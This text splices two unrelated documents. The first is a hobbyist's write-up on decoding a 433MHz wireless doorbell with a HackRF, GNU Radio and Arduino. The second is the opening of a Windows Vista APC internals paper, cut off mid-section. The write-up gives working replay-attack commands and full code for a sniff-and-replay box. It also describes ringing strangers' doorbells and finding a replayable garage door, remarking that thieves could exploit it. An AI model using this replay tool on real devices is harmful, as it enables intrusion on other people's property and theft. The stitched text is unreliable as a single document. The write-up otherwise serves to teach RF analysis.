2.3 Direct Current spike ................................................................................................................... 7
#3. Isolating the signal .......................................................................................................................... 8
3.1 Managing the DC spike with GNU Radio Companion ............................................................. 8
3.2 Isolating the signal with Gnu Radio Companion ....................................................................... 8
#4. Modulation.................................................................................................................................... 10
4.1 ASK modulation ...................................................................................................................... 10
4.2 Demodulation with GNU Radio Companion ........................................................................... 10
#5. From the demodulated signal to the bit ........................................................................................ 12
5.1 Manual identification ............................................................................................................... 12
5.2 Automatic identification .......................................................................................................... 12
#6. Arduino confirmation ................................................................................................................... 14
6.1 Schema..................................................................................................................................... 14
6.2 Code......................................................................................................................................... 14
6.3 Experiment............................................................................................................................... 14
#7. Emission....................................................................................................................................... 15
7.1 HackRF emission ..................................................................................................................... 15
7.2 Arduino.................................................................................................................................... 15
7.3 GNU Radio Companion ........................................................................................................... 16
#8. 315/433-Mbox: the “replay attacks” box ...................................................................................... 18
8.1 Schema..................................................................................................................................... 18
8.2 Code......................................................................................................................................... 18
8.3 Prototype.................................................................................................................................. 20
8.4 Production................................................................................................................................ 21
8.5 Test in the wild ......................................................................................................................... 23
#9. Conclusion.................................................................................................................................... 24
#10. Greetings..................................................................................................................................... 24
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 2/24
#1. Introduction
Thanks to @defane (see Greetings chapter), I discovered, in April 2015, the joy of radio frequency (RF)
hacking. I decided to start with an easy case and to play with a low cost wireless door bell. My adventure
was more complicated than expected so I decided to perform a write-up in order to explain how I proceeded
and to help newbies (like myself) to play with RF hacking.
IMPORTANT: I'm not a specialist in radio and I did not learn this domain during my studies. All the described
elements in this document has been observed during my experiments and searches performed on the
Internet.  So  I  probably  (certainly?)  did  some  mistakes.  If  you  find  errors,  feel  free  to  contact  me  at
paul@r00ted.com and I'll be happy to update this document.
The GNU Radio Companion schema and the source codes are available here: 
https://bitbucket.org/rootbsd/433mhz-ask-signal-analysis/ .
Note: I have got one missing point concerning the chapter 7.3. I did not find a way to transmit ASK signal
thanks  to  GNU  Radio  Companion.  If  you  know  why,  could  you  please  send  me  an  email  at
paul@r00ted.com.
1.1 RF Hardware
To realize the work described in the article, I used the HackRF One. Here is the description of this device on
Great Scott Gadgets website1:
“HackRF One from Great Scott Gadgets is a Software Defined Radio peripheral capable of transmission or
reception of radio signals from 10 MHz to 6 GHz. Designed to enable test and development of modern and
next generation radio technologies, HackRF One is an open source hardware platform that can be used as a
USB peripheral or programmed for stand-alone operation.
•10 MHz to 6 GHz operating frequency 
•half-duplex transceiver 
•up to 20 million samples per second 
•8-bit quadrature samples (8-bit I and 8-bit Q) 
•compatible with GNU Radio, SDR#, and more 
•software-configurable RX and TX gain and baseband filter 
•software-controlled antenna port power (50 mA at 3.3 V) 
•SMA female antenna connector 
•SMA female clock input and output for synchronization 
•convenient buttons for programming 
•internal pin headers for expansion 
•Hi-Speed USB 2.0 
•USB-powered 
•open source hardware “
1http://greatscottgadgets.com/hackrf/
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 3/24Illustration 1: HackRF One

1.2 victim: wireless door bell
For my first analysis, I chose a low cost wireless door bell available at Castorama2 (a French retailer of home
improvement tools and supplies). The name of the product is “Carillon sans fil SOLO BLYSS”3. I assume that
the BLYSS brand is the property of Castorama. Here is a picture of the product:
1.3 Software
I used several software in order to analyze the wireless door bell:
•GQRX4: it is a software defined radio receiver. I used this tool to find the exact frequency used by the
bell.  This  tool  allows  to  easily  change  frequency,  gain  and  display  the  RF  spectrum.
2http://fr.wikipedia.org/wiki/Castorama
3http://www.castorama.fr/store/Carillon-sans-fil-SOLO-BLYSS-prod6390004.html
4http://gqrx.dk/
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 4/24Illustration 2: SOLO BLYSS wireless door bell
Illustration 3: GQRX screen-shot from the official website

•GNU Radio Companion  (GRC)5: it is a graphical tool to create signal flow graphs and generating
flow-graph source code. I used this tool to manipulate (demodulated) the signal issued by the bell.
1.4 Extra hardware
In order to validate my work, I used an Arduino Uno6 device with a 433Mhz receiver and transmitter. I found
the receiver and the transmitter on Ebay at 1€ here7. Here is the picture of the two devices:
5https://gnuradio.org/redmine/projects/gnuradio/wiki/GNURadioCompanion
6http://www.arduino.cc/en/Main/ArduinoBoardUno
7http://www.ebay.fr/itm/315-433Mhz-WL-RF-Module-dEmetteur-Recepteur-Telecommande-Pr-Arduino-ARM-
MCU-ASK-/331340939090
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 5/24Illustration 4: GNU Radio Companion screen-shot from the official website
Illustration 5: 433Mhz receiver and 
transmitter

#2. Identify the signal
The first task to analyze a radio signal is to identify the frequency used by the device. If the device is sold in
the USA, the manufacturer must declare it to the Federal Communications Commission (FCC). On the
declaration, the frequency is mentioned and publicly available. For example, the frequency used by a
Microsoft  keyboard  is  available  at  this  link:  http://fccid.net/number.php?fcc=C3K1455&id=451957.  In  my
case, the device does not have a FCC ID because it seems to not be sold in the USA (or with an alternative
brand that I did not identify). Generally these kinds of low cost radio devices use a 433Mhz transmitter and
receiver because the of hardware is really cheap. Let's see my wireless door bell...
2.1 Read the bell's box
In my case, the easiest way to identify the frequency was to read the label on the transmitter:
As expected, the used frequency was 433.92MHz.
2.2 GQRX
I used GQRX to clearly identify the frequency:
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 6/24Illustration 6: Label of the transmitter
Illustration 7: GQRX screen-shot

The data was sent on several frequencies (all peaks appear when I pushed the button of the transmitter). I
arbitrary chose the frequency 433.987Mhz for the article. Furthermore, I heard noise on my speakers when I
was tuned on the good frequency and I pushed the button of the transmitter.
2.3 Direct Current spike
When I used my HackRF (and probably many RTL-SDR dongles), a huge spike appears exactly at the
location where the radio has been tuned. This was the Direct Current (DC) spike (the blue line of the
illustration 7). The HackRF FAQ provides more information8 about this fact.
To deal with this behavior, I had to tune the hardware to capture the radio's transmission next to the desired
value and configure an offset to shift. In the illustration 7, the hardware frequency was 433.867Mhz (blue
line) and the offset was 120Khz so the displayed frequency was 433.867+0.120=433.987Mhz.
8https://github.com/mossmann/hackrf/wiki/FAQ#what-is-this-big-spike-in-the-center-of-my-received-spectrum
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 7/24
#3. Isolating the signal
3.1 Managing the DC spike with GNU Radio Companion
I had exactly the same problem in GNU Radio Companion as in GQRX, I had to deal with the DC spike. To
perform this task,  I used  the  “Frequency Xlating FIR Filter” block.  Here is  the  GRC schema  and the
associated Scope output:
In the “Osmocom source” block, the frequency was set to freq+offset.
In the “Frequency Xlating FIR Filter” block the center frequency was set to -offset.
Finally in the scope, the frequency was set to freq.
In the illustration 9, the spike was not centered and shifted to 120KHz.
3.2 Isolating the signal with Gnu Radio Companion
The next step was to isolate the signal. The action was performed via the “Taps” value in the “Frenquency
Xlating FIR Filter” block. Here is the formula in my context:
firdes.low_pass(1, samp_rate, 120000, 60000, firdes.WIN_BLACKMAN, 6.76)
The value 120000 and 60000 are specific to my context. During my experiments, I saw that the second value
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 8/24Illustration 8: GRC Schema
Illustration 9: Scope after the Xlating block

was 50 percent of the first value. I used a “WX GUI Slider” block to fine tune the value in order to obtain this
kind of scope:
The DC spike was on the right and my signal (green peak) was in the center.
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 9/24Illustration 10: Scope of the isolated signal

#4. Modulation
Once the signal was isolated, I needed to demodulate it in order to analyze it. There exists two kinds of
modulation:
•ASK:  Amplitude-shift  key. To demodulate  this  modulation  I  can  use  the  “Complex  to  Mag”  or
“Complex to Mag ^ 2” block in GNU Radio Companion.
•FSK: Frequency-shift key. To demodulate this modulation I can use the “Quadratue Demod” block in
GNU Radio Companion.
The modulation used in cheap 433MHz transmitter is ASK.
4.1 ASK modulation
Here is the Wikipedia9 description of the ASK modulation:
“Amplitude-shift keying  (ASK) is a form of amplitude modulation  that represents digital data as variations
in the amplitude of a carrier wave. In an ASK system, the binary symbol 1 is represented by transmitting a
fixed-amplitude carrier wave and fixed frequency for a bit duration of T seconds. If the signal value is 1 then
the carrier signal will be transmitted; otherwise, a signal value of 0 will be transmitted.”
4.2 Demodulation with GNU Radio Companion
Here is the GRC schema used to demodulate my signal:
For your information, the “Sample Rate” in the Scope was divided by 10 due to the “Decimation” value in the
“Low PassFilter” block. Thanks to the demodulation, I was able to see the data in the scope:
9http://en.wikipedia.org/wiki/Amplitude-shift_keying
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 10/24Illustration 11: Demodulation GRC schema

433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 11/24Illustration 12: Demodulated signal

#5. From the demodulated signal to the bit
5.1 Manual identification
I my case, there was a ASK/OOK10 modulation. This modulation could be easily read by a human. In the
demodulated signal, a large block is equal to 0 and a small block is equal to 1. This draw explains how I read
the illustration 12 in order to have the data sent by the device:
The  value  was  0011  0100  0011  1111  1101  0101  1001  0011  (0x343FD593  or  876598675).
This value was sent several time when I pushed on the transmitter button.
5.2 Automatic identification
I automatized this task thanks to GNU Radio Companion. I used the blocks “Clock Recovery MM” and
“Binary Slicer”:
Some explanations concerning the schema:
10http://en.wikipedia.org/wiki/On-off_keying
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 12/24
Illustration 13: Final GRC schema

•the “Add Const” block was used to have a negative value for 0 and a positive value for 1
•the “Clock Recovery MM” block was used to know when the software has to “cut” the signal
•the “Binary Slicer” block was used to generate binary
•The end of the loop was used to have the binary code and the demodulated signal in a unique
scope.
I wrote there the content of the output file (generated by the “File Sink” block”):
paul@laptop:~/tuto1$ hd article.out | head 
00000000  00 00 00 01 01 01 01 01  01 01 01 01 01 01 01 01  |................| 
00000010  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................| 
* 
000041f0  00 00 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................| 
00004200  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................| 
00004210  01 01 01 01 01 01 00 00  01 01 01 01 01 01 01 01   |................| 
00004220  00 00 01 01 01 01 01 01  01 01  00 00 00 00 00 00  |................| 
00004230  00 01 01 01 00 00 00 00  00 00 00 01 01 01  00 00  |................| 
00004240  01 01 01 01 01 01 01 01   00 00 00 00 00 00 00 01   |................| 
00004250  01 01 00 00 01 01 01 01  01 01 01 01  00 00 01 01  |................| 
I added the colors in order to identify each block of data. Here is the data decomposed:
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 01 01 01 01 01 01 01 01  => 0 
00 00 00 00 00 00 00 01 01 01  => 1 
00 00 00 00 00 00 00 01 01 01  => 1 
The result is 0011 0100 0011 1111 1101 0101 1001 0011. The same as expected.
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 13/24
#6. Arduino confirmation
I easily created an Arduino project to confirm if my previous analysis was correct.
6.1 Schema
It was really simple to use the 433MHz receiver, I took a picture of my schema:
The blue wire was for the data (D2).
The red wire was +5V.
The black wire was GND.
6.2 Code
The code used for the reception:
#include <RCSwitch.h>
RCSwitch mySwitch = RCSwitch();
void setup() {
  Serial.begin(9600);
  mySwitch.enableReceive(0);  // Receiver on interrupt 0 => that is pin #2
}
void loop() {
  if (mySwitch.available()) {
    Serial.print("Value: "); Serial.print(mySwitch.getReceivedValue() );
    Serial.print(" / "); Serial.print(mySwitch.getReceivedValue(), BIN);
    Serial.print(" Length: "); Serial.print(mySwitch.getReceivedBitlength() );
    Serial.print(" Delay: "); Serial.print(mySwitch.getReceivedDelay() );
    Serial.print(" Protocol: "); Serial.println(mySwitch.getReceivedProtocol());
    mySwitch.resetAvailable();
  }
}
6.3 Experiment
The “serial monitor” output matched perfectly my previous conclusion:
Value: 876598675 / 110100001111111101010110010011  Length: 32 Delay: 707 Protocol: 2 
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 14/24Illustration 14: Arduino schema

#7. Emission
7.1 HackRF emission
The easiest way to replay the signal was to use the software provided with HackRF: hackrf_transfer.
The  option  “-f”  is  for  the  frequency, “ -r filename”  is  to  record  the  data  to  a  file  and  finally  “ -t
filename” is to transmit the data read from the file. 
Firstly, I recorded the signal: 
paul@laptop:~/tuto1$ hackrf_transfer -r sample_433987000.wav -f 433987000 
call hackrf_sample_rate_set(10000000 Hz/10.000 MHz) 
call hackrf_baseband_filter_bandwidth_set(9000000 Hz/9.000 MHz) 
call hackrf_set_freq(433987000 Hz/433.987 MHz) 
Stop with Ctrl-C 
19.9 MiB / 1.000 sec = 19.9 MiB/second 
19.9 MiB / 1.000 sec = 19.9 MiB/second 
19.9 MiB / 1.000 sec = 19.9 MiB/second 
^CCaught signal 2 
 7.3 MiB / 0.356 sec = 20.6 MiB/second 
User cancel, exiting... 
Total time: 3.35637 s 
hackrf_stop_rx() done 
hackrf_close() done 
hackrf_exit() done 
fclose(fd) done 
exit 
After I replayed it:
paul@laptop:~/tuto1$ hackrf_transfer -t sample_433987000.wav -f 433987000 
call hackrf_sample_rate_set(10000000 Hz/10.000 MHz) 
call hackrf_baseband_filter_bandwidth_set(9000000 Hz/9.000 MHz) 
call hackrf_set_freq(433987000 Hz/433.987 MHz) 
Stop with Ctrl-C 
19.9 MiB / 1.000 sec = 19.9 MiB/second 
19.9 MiB / 1.000 sec = 19.9 MiB/second 
20.2 MiB / 1.000 sec = 20.2 MiB/second 
^CCaught signal 2 
 2.4 MiB / 0.118 sec = 19.9 MiB/second 
User cancel, exiting... 
Total time: 3.11909 s 
hackrf_stop_tx() done 
hackrf_close() done 
hackrf_exit() done 
fclose(fd) done 
exit 
And the bell ringed!
7.2 Arduino
I could perfectly send the data via an Arduino device. Here is my schema:
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 15/24
The blue wire was for the data (D10).
The red wire was +5V.
The black wire was GND.
The source code:
#include <RCSwitch.h> 
RCSwitch mySwitch = RCSwitch(); 
void setup() { 
  Serial.begin(9600); 
  mySwitch.enableTransmit(10); 
  mySwitch.setProtocol(2); 
  mySwitch.setRepeatTransmit(15); 
  mySwitch.setPulseLength(690); 
} 
void loop() { 
  mySwitch.send(876598675, 32); 
  delay(20000);  
} 
As expected the bell ringed!
7.3 GNU Radio Companion
And finally, I could use GNU Radio Companion to generate the data sent to my HackRF device. However I
did not find a way to successfully transmit the data to the receiver. Here is my attempt:
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 16/24Illustration 15: Arduino schema

I could see in the scope the same data as expected:
However it did not work as expected...
If someone knows why my schema does not work, could you please contact me at paul@r00ted.com.
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 17/24Illustration 16: GNU Radio Companion schema
Illustration 17: Sent data in the scope

#8. 315/433-Mbox: the “replay attacks” box
I decided to create an Arduino prototype in order to automatize “replay attacks” on 315/433 MHz. The
prototype had two features:
•to sniff the 433MHz (and 315MHz) signal and store the value, the length and the pulse;
•to replay the stored value;
The final tool had to live in a Lego TM home-made box and included:
•two buttons: a first one to start to scan and second one to replay the captured value; 
•two LED: a first one (green) to notify that the box is currently scanning and second one (red) to
notify that a value was detected.
I named the project 315/433-Mbox.
8.1 Schema
8.2 Code
#include <RCSwitch.h> 
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 18/24Illustration 18: Arduino 315/433-Mbox schema

RCSwitch receiver = RCSwitch(); 
RCSwitch transmitter = RCSwitch(); 
int bt_scan=5; //scan button 
int bt_replay=6; //replay button 
int red_led=12; //red LED - when a signal is sniffed 
int green_led=13; //green LED - when the board is scanning 
unsigned long value=0; //data to replay 
int length=0;  //data length to replay 
int protocol=0; //data protocol to replay 
int pulse=0; //data pulse 
void setup() { 
  Serial.begin(9600); 
  receiver.enableReceive(0); 
  pinMode(bt_scan, INPUT); 
  pinMode(bt_replay, INPUT);   
  pinMode(green_led, OUTPUT); 
  pinMode(red_led, OUTPUT); 
  
  digitalWrite(green_led, HIGH); 
  digitalWrite(red_led, LOW); 
} 
void loop() { 
  
  if (receiver.available()) { 
    digitalWrite(green_led, LOW); 
    digitalWrite(red_led, HIGH); 
    
    Serial.print("Value: "); 
    value=receiver.getReceivedValue(); 
    Serial.print(receiver.getReceivedValue() ); 
    Serial.print(" / "); 
    Serial.print(receiver.getReceivedValue(), BIN); 
    
    Serial.print(" Length: "); 
    length=receiver.getReceivedBitlength(); 
    Serial.print(receiver.getReceivedBitlength() ); 
    
    Serial.print(" Delay: "); 
    pulse=receiver.getReceivedDelay(); 
    Serial.print(receiver.getReceivedDelay() ); 
    
    Serial.print(" Protocol: "); 
    protocol=receiver.getReceivedProtocol(); 
    Serial.println(receiver.getReceivedProtocol()); 
  } 
  
  if (digitalRead(bt_replay)) { 
    if (value!=0) { 
      Serial.print("Button replay pressed: "); 
      Serial.print(value); 
      Serial.print(" Lenght: "); 
      Serial.print(length); 
      Serial.print(" Pulse: "); 
      Serial.print(pulse); 
      Serial.print(" Protocol: "); 
      Serial.print(protocol); 
      Serial.println(""); 
      
      receiver.disableReceive(); 
      transmitter.enableTransmit(10); 
      transmitter.setProtocol(protocol); 
      transmitter.setRepeatTransmit(15); 
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 19/24
      transmitter.setPulseLength(pulse-15); 
      transmitter.send(value, length); 
      delay(1000); 
      
      value=0; 
      protocol=0; 
      pulse=0; 
      length=0; 
      
      receiver.enableReceive(0); 
      digitalWrite(green_led, HIGH); 
      digitalWrite(red_led, LOW); 
    } 
  } 
  if (digitalRead(bt_scan)) { 
    Serial.print("Button scan pressed"); 
    digitalWrite(green_led, HIGH); 
    digitalWrite(red_led, LOW); 
    receiver.resetAvailable(); 
  } 
}
8.3 Prototype
Here is a picture of the prototype:
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 20/24Illustration 19: 315/433-Mbox prototype

8.4 Production
Version 1: “the ant”
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 21/24Illustration 20: 315/433-MBox final result
Illustration 21: 315/433-MBox final result

Version 2: powered by a LCD
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 22/24Illustration 22: 315/433-MBox final result
Illustration 23: 315/433-MBox with LCD

8.5 Test in the wild
After a week-end walking in the streets closed to my home I was able to switch on a few door bells remotely.
The only risk in this context is to make people crazy ;). More interesting, I found one garage that uses
433MHz ASK signal to open the door. In this case, thieves could be interesting to sniff the signal to transmit it
when the owner is not at home.
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 23/24Illustration 24: 315/433-MBox with LCD
Illustration 25: 315/433-MBox with LCD
Illustration 26: 315/433-MBox with LCD

#9. Conclusion
I discovered radio frequency hacking a few weeks ago and the first results are quiet interesting. The biggest
difficulties concerned the usage of GNU Radio Companion but I found a lot of people who helped me to
understand the tool ;) (see the next chapter).
Concerning the result of my 315/433-Mbox, I was surprised of the quantity of home appliances “vulnerable”
to replay attacks such as door bells (the threat is not huge but you can make people crazy if the bell rings all
the time...), wireless garage door (the risk of theft is really important in this context)... On all my tests, it
basically works on cheap devices. If you schedule to buy a wireless appliance such as a wireless garage
door, do not hesitate to control the quality of the radio used and if a simple replay attack works on it.
My next play will be on FSK modulation and obviously, I will redact a write-up of this adventure.
#10. Greetings
Stéphane Emma (@defane), for the antenna chapter and to introduce me in the RF world.
Jean-Michel Picod (@jmichel_p), for its amazing patience and help.
Jérôme Nokin (@funoverip), for its awesome job related to the Verisure alarms11 & its advices.
Yves Rougy (@yrougy), for its help concerning the “binary slicer” block in Gnu Radio Companion.
The #hackrf channel, for its advices.
And finally to Michael Ossmann (@michaelossmann) to create awesome gadgets such as the HackRF One 
used for this work.
11https://funoverip.net/tag/verisure/
433MHz ASK signal analysis – Wireless door bell adventure by Paul Rascagnères 24/24 
Wind ows  Vista  APC Internals  
 
By Enrico Martignetti  
First edition, May 2009  
 
Sample Code  
PDF Version  
Home
If you are interested in the internals of 
Windows, ch eck out Enrico Martignetti's 
book on the Virtual Memory Manager.  
Click here to find out more.  
2 
  
Table of Contents  
 
Introduction And Acknowledgements  ................................ ................................ ................................ ...... 4 
APC Basic Concepts  ................................ ................................ ................................ ...............................  4 
APC Process Context  ................................ ................................ ................................ .............................  4 
APC Types  ................................ ................................ ................................ ................................ ..............  5 
APC Initialization  ................................ ................................ ................................ ................................ ..... 6 
Initial APC Scheduling  ................................ ................................ ................................ .............................  8 
Special And Regular Kernel Mode APCs  ................................ ................................ ................................  9 
Scheduling  ................................ ................................ ................................ ................................ ...........  9 
Linking _KAPC to Its List  ................................ ................................ ................................ .................  9 
Directing The Thread to Execute The APC  ................................ ................................ .....................  9 
Triggering Thread Dispatching  ................................ ................................ ................................ ...... 19 
Delivery  ................................ ................................ ................................ ................................ ..............  19 
Effect of _KTHREAD.SpecialApcDisable Bein g Set  ................................ ................................ ...... 20 
Kernel APC Delivery When SpecialApcDisable Is Clear  ................................ ...............................  21 
Special Vs. Regular Kernel APCs  ................................ ................................ ................................ ..... 23 
User Mode APCs  ................................ ................................ ................................ ................................ .. 23 
Scheduling  ................................ ................................ ................................ ................................ .........  23 
Linking _KAPC to Its List  ................................ ................................ ................................ ...............  24 
Directing The Thread to Execute The APC  ................................ ................................ ...................  24 
nt!PsExitSpecialApc and The Special User APC  ................................ ................................ ..........  24 
Trigg ering Thread Dispatching  ................................ ................................ ................................ ...... 25 
Delivery  ................................ ................................ ................................ ................................ ..............  25 
nt!KiDeliverApc Invocation  ................................ ................................ ................................ .............  25 
Effect of User Mode APCs on Kernel Wait Functions  ................................ ................................ ... 26 
nt!KiDeliverApc for User APCs  ................................ ................................ ................................ ...... 27 
nt!KiInitializeUserApc And The User Mode Context  ................................ ................................ ...... 28 
3 
 User Mode APC Delivery by ntdll!KiUserApcDispatcher  ................................ ...............................  30 
ntdll!NtContinue And The User Mode Context  ................................ ................................ ..............  30 
Appendix - The Test Driver  ................................ ................................ ................................ ...................  31 
IMPORTANT WARNING  ................................ ................................ ................................ ...................  31 
Driver Package Contents  ................................ ................................ ................................ ...................  31 
Driver ................................ ................................ ................................ ................................ ..............  32 
TestClt  ................................ ................................ ................................ ................................ ............  32 
CommonFile  ................................ ................................ ................................ ................................ ... 32 
Loading And Running The Driver  ................................ ................................ ................................ ...... 32 
What The Driver Can Do  ................................ ................................ ................................ ...................  32 
APC Spurious Interrupt Test  ................................ ................................ ................................ ..........  32 
Sample Trace  ................................ ................................ ................................ ................................ . 34 
Atypical Traces  ................................ ................................ ................................ ..............................  36 
APC Disable Test  ................................ ................................ ................................ ...........................  39 
APC User Mode Test And APC User Mode Test #2  ................................ ................................ ..... 39 
References  ................................ ................................ ................................ ................................ ............  40 
 
4 
 Introduction A nd Acknowledgements  
There are several articles on the subject of Windows APCs  and in particular Inside NT's 
Asynchronous Procedure Call  by Albert Almeida (Dr. Dobb’s Journal, Nov 01, 2002) contains a good 
deal of information about them.  To be fair, that  article has guided me throug hout the writing of this 
one. My attempt has been to add  a few more details to the concepts presented  and a little insight into 
undoc umented Windows features, like the GATEWAIT and DEFERREDREADY  thread  state s, which 
are tied to how APCs work.  
Furthermore ,  Almeida’s  article was published  when Windows XP was current, so another goal  of this 
work  has been to revise the information presented  there  for Windows Vista. Unless otherwise 
specified, all the material  contained here has been verified agains the Window s Vista SP1 Ultimate 
Edition code  (for x86) . 
APC Basic Concept s 
APCs are a Windows functionality  that can  divert  a thread  from its regular execution  path and  direct it  
to execute some  other  code . The  most important thing about  an APC is that when one is schedule d, it 
is targeted to a specific thread.  
 APCs are little documented: the  kernel  APIs to use them are not public and their inner working is only 
partially covered. What makes them interesting is that they are tied with the way Windows dispatches 
threa ds, thus, by analy zing them we can better understand this core  Windows feature.  
Windows internals books often mention the fact that an APC is scheduled by means of a software 
interrupt . This raises the question of how can the system guarantee that this int errupt will run in the 
context of a particular thread . This is , ultimately,  the purpose on an APC , but software interrupts can 
break into the execution of whatever thread is current. We will see in this document how Windows 
accomplishes th is. 
Code executed  by means of an APC can run, depending on the APC type,  at a dedicated IRQL level, 
which, not surprisingly, is called APC level.  
So, what are APCs used for? Among other things:  
 The I/O manager uses an APC to  complete an I/O operation in the context of the thread which 
initiated it.  
 A special APC is used to break into  the execution of a process when it must terminate . 
 The kernel implementation of APCs is under the hood of  Windows API functions like 
QueueUserAPC and ReadFileEx/WriteFileEx, when used to perfo rm asychronous I/O.  
APC Process Context  
Normally, a Windows thread executes in the context of the process which created it. However, it is 
poss ible for a thread to attach its elf to another process, which means it will execute in its context.  
Windows accoun ts for this when managing APCs: they can be schedule d to run in the context of the 
process which owns the thread, or in the context of whichever  process the thread is currently attached  
to.  
5 
 A detailed explanation of  how this is achieved can be found in [1 ] in the section titled APC 
Environments . I did not revise this material for Windows Vista, however, all the APC control variables 
described there are still present and used in the rest of the Vista APC implementation. Below is a 
summary of the Environment s section  
Windows maintains the state of APCs waiting to execute in  the _KAPC_STATE data structure, shown 
below  (output from the WinDbg dt command) : 
kd> dt nt!_KAPC_STATE  
   +0x000 ApcListHead      : [2] _LIST_ENTRY  
   +0x010 Process          : Ptr32 _KPRO CESS 
   +0x014 KernelApcInProgress : UChar  
   +0x015 KernelApcPending : UChar  
   +0x016 UserApcPending   : Uchar  
 
The main kernel data structure _KTHREAD has two members of type _KAPC_STATE, named 
ApcState  and SavedApcState , which are called APC environmen ts. ApcState is the environment for 
APCs targeted at the current thread context: regardless of whether the thread is attached to its own 
process, or another one, this member contains APCs for the current process context and therefore 
deliverable  ones . Save dApcState stores APCs for the context which is not current and that must wait. 
For instance, if the thread is attached to a process other than its owner and there are APCs for the 
owner process, they go into SavedApcState and have to wait until the thread detaches from the other 
process.  
From the explanation above, we  can understand that when a thread attaches itself to another 
process, ApcState is copied into SavedApcState and re -initialized. When the thread detaches itself, 
ApcState is restored from Saved ApcState, which is then emptied.  Also, we can see that the kernel 
components responsible for dispatching APCs, always look in to ApcState for delivarable ones . 
The _KTHREAD structure also stores an array of 2 pointers called ApcStatePointer , whose members  
hold the addresses of ApcState and SavedApcState (that is, they point inside _KTHREAD itself). The 
kernel updates  these pointer s so that the first one always points to the APC environment for the 
thread owning process and the second one points to the envir onment for an eventual process the 
thread is attached to.  
For instance, if the thread is not attached to another process, the Environment for the owning process 
is also currently active, therefore  it is stored into ApcState and ApcStatePointer [0] hold s the  address 
of ApcState.  
Finally, _KTHREAD. ApcStateIndex  stores the index of the pointer to ApcState, i. e. the active 
environment. Thus, if the thread is attached to another process, the owning process environment is 
into SavedApcState, ApsStatePointer[0] po ints to SavedApcState, because it always points to the 
owning process environment. In turn, ApcStatePointer[1] points to ApcState, b ecause it always points 
to the attached process environment. Finally, ApcStateIndex is set to 1, because it is 
ApcStatePoint er[1] which is pointing to the active environment.  
When we schedule an APC, we can  specify that we want to add it  to the environment for the owning 
process  (i. e. the one pointed by ApcStatePointer[0]) , to the secondary one  (ApcStatePointer[1])  or to 
which ever envi ronment is currently active (i. e. the one at ApcState, no matter what).  
APC Types  
APCs come in three kinds.  
6 
 Special kernel mode  APCs execute kernel mode code  at APC IRQL (i. e. 1). They are truly 
asynchronous events that divert a thread from its normal execution path to the kernel mode function 
to be ex ecuted, which is called KernelRoutine . 
If an SK APC is queued to a thread which has entered a waiting state by calling one of the four 
waiting routines KeWaitForSingleObject, KeWaitForMultipleObject s, KeWaitForMutexObject, or 
KeDelayExecutionThread , the thread is awake ned to execute the KernelRoutine and will re -enter its 
waiting state afterwards.  
Normally, SK APCs are always delivered as soon as the target thread is running and  its IRQL drop s 
below APC level. However,  APC delivery can be disabled on a thread by thread basis.  When the 
SpecialApcDisable  member of the  _KTHREAD structure  is not 0,  APC delivery  does not occur  for the 
corresponding thread , not even for  SK APCs.  
Regular kernel mode  APCs  execute kernel mode code at PASSIVE IRQL. Like SK APCs they can 
break into the execution of threads and bring them out of waiting states. However, they are 
dispatched only under more restrictive  conditions, which will be detailed later.  
User mode  APCs call us er mode code and are executed under  even  more restrictive conditions than 
kernel mode ones: they are dispatched to a thread only when it willingly  enters an alert able wait state 
(except for one special case,  detailed later). This happens when a thread call s one of the four waiting 
routines KeWaitForSingleObject, KeWaitForMultipleObjects, KeWaitForMutexObject, or 
KeDelayExecutionThread  with Alertable = true and W aitMode = User.  
Thus, normally, U APCs don’t asynchronously break into the execution of a thread.  They are more 
like a form of queu eable work items: they can be queued to a thread at any time and the thread code 
decides  when to process them.  
APC Initialization  
